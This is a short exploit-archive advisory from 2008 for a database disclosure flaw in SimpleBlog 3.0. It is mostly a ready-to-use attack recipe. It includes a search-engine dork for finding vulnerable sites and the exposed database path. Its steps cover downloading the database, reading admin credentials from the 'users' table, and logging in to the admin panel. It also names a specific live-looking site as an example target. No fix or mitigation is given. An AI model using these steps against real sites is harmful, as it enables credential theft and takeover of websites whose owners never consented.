[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : SimpleBlog 3.0 (simpleBlog.mdb) Database Disclosure Vulnerability
# Published : 2008-11-25
# Author : EL_MuHaMMeD
# Previous Title : fuzzylime cms 3.03 (track.php p) Local File Inclusion Vulnerability
# Next Title : LoveCMS 1.6.2 Final (Download Manager 1.0) File Upload Exploit
[??] SimpleBlog 3.0 Mdb Vulnerability
[??]
[??] ----------------------------------------------------------
[??] Author : EL_MuHaMMeD
[??]
[??] Date : 26.11.2008
[??]
[??] Contact : cwelmuhammed@gmail.com
[??]
[??] -----------------------------------------------------------
Script : SimpleBlog 3.0
Download : http://www.8pixel.net/FetchFile.aspx?doc=simpleblog3.rar
Dork : "inurl:simpleblog3"
Our mdb path : db/simpleBlog.mdb
Exploits :
Step 1 - http://www.[target].com/[path]/simpleblog3/db/simpleBlog.mdb
Step 2 - Download that mdb file and read admin name & pass from "users" table.
Step 3 - http://www.[target].com/[path]/simpleblog3/admin/default.asp
Example :
http://www.bvrg.org.uk/simpleblog3/db/simpleBlog.mdb
http://www.bvrg.org.uk/simpleblog3/admin/default.asp
[??] ----------------------------------------------------------------------
[??]
[??] Cyber-Security.ORG - ELMuHaMMeD.COM
[??]
[??] ----------------------------------------------------------------------
# www.Syue.com [2008-11-25]